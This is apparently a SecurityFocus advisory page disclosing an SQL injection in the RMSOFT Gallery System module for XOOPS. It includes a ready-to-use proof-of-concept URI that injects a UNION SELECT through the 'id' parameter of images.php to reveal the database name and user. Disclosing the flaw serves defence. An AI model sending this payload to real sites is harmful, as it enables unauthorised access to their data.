Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

RMSOFT Gallery System For XOOPS 'images.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*







 

Privacy Statement
Copyright 2009, SecurityFocus